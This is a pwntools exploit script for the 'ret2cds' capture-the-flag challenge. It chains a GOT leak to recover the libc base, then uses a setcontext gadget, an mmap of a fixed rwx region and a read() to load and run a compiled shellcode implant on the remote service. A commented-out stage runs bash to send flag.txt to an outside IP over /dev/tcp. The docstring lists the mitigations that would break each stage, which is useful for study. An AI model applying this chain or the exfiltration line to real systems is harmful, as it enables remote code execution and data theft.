"""Exploit driver for the "ret2cds" pwn challenge, written against pwntools.

Layout of the script as the code below shows it: a first ROP chain in the
challenge binary leaks the GOT entry of ``write`` over the connection, the
leak is turned into a libc base, a second chain (in libc) maps a fixed
rwx region and ``read()``s a payload into it, and the payload is the
contents of ``implant.bin`` produced by ``make``.

What the script relies on (useful when reading it as a defender): absolute
binary addresses are used as constants (``0x0040123a``, ``0x402008``), so a
non-PIE build is assumed; the GOT must be readable for the leak; the
second stage needs an executable anonymous mapping (``mmap`` prot ``7``);
and the gadget offset ``0x581e1`` is specific to the bundled
``libc.so.6``. PIE, full RELRO, W^X enforcement or a bounds-checked input
path would each break the corresponding stage.
"""
from pwn import *
import os

context.arch = 'amd64'


def run():
    """Run the three exploit stages against the remote service and drop to an interactive session.

    Stage 1: ROP chain in the binary -> ``write(1, GOT[write])`` leak.
    Stage 2: libc ROP chain -> ``mmap(0x133713370000, 0x10000, 7, 0x32)`` then
             ``read(0, 0x133713370000, 0x10000)`` and return into the mapping.
    Stage 3: ``make`` builds ``implant.bin``; its bytes, zero-padded to exactly
             0x10000, are sent as the payload the ``read()`` is waiting for.

    Side effects: opens a TCP connection, runs ``make`` in the current
    directory, prints chain dumps and leaked values. The connection is
    always closed in ``finally``.
    """
    elf = ELF("../challenge/chall/ret2cds")
    rop = ROP(elf)
    # Stage 1 primitive: write the GOT slot of write() to stdout (fd 1).
    # pwntools resolves the gadgets from the binary itself.
    rop.write(1, elf.got['write'])
    print(rop.dump())
    libc = ELF("../challenge/chall/libc.so.6")
    print(hex(libc.symbols['write']))
    # r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"})
    # gdb.attach(r)
    # r = remote("localhost", 1337)
    r = remote("ret2cds.be.ax", 34485)
    try:
        # NOTE(review): str pattern; recent pwntools expects bytes here and may
        # warn — b"warden: " would be the strict form.
        r.recvuntil("warden: ")
        # 256 bytes fill the buffer; the next 8 presumably overwrite the saved
        # frame pointer before the return address — TODO confirm against the
        # binary's frame layout. 0x0040123a is where execution returns to
        # after the leak (presumably back into the vulnerable input path so a
        # second chain can be sent — confirm).
        r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
        print(r.recvline())
        print(r.recvline())
        # The raw 8-byte GOT value arrives on its own line; the first byte is
        # skipped (presumably a leading prompt/newline char — TODO confirm)
        # and the remaining 7 bytes are zero-padded for u64.
        leak = r.recvline()[1:8]
        leak = u64(leak.ljust(8, b'\x00'))
        print(hex(leak))
        # Rebase libc: leaked address minus the symbol's offset in the file.
        libc_base = leak - libc.symbols['write']
        print(hex(libc_base))
        libc.address = libc_base
        libc_rop = ROP(libc)
        # prot=7 is PROT_READ|PROT_WRITE|PROT_EXEC, flags=0x32 is
        # MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS; the mapping is placed at a
        # fixed address so the chain can return into it without another leak.
        libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
        libc_rop.read(0, 0x133713370000, 0x10000)
        print(libc_rop.dump())
        print(libc_rop.chain())
        # abuse setcontext lol
        # setcontext is always a good function to look for cool gadgets in
        # loaded as 0x0
        # 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
        # 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
        # 88 00 00 00
        # 001581ec 31 c0 XOR EAX,EAX
        # 001581ee c3 RET
        # Offset 0x581e1 is taken from the disassembly above (libc loaded at
        # 0) and is only valid for the bundled libc.so.6.
        fucky_r9_gadget = p64(0x581e1 + libc_base)
        # load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
        pre_rop = ROP(libc)
        # 0x402008 is assumed to be a zero-filled .rodata address in the
        # challenge binary (non-PIE) — TODO confirm.
        pre_rop.rdx = 0x402008 - 0x30
        r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
        # Builds implant.bin in the current working directory.
        os.system("make")
        with open("implant.bin", "rb") as f:
            shellcode = f.read()
        # Pad to exactly 0x10000 bytes to match the size the chain's read()
        # asked for.
        shellcode += b"\x00" * (0x10000 - len(shellcode))
        r.send(shellcode)
        # stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
        r.interactive()
    finally:
        r.close()


if __name__ == "__main__":
    run()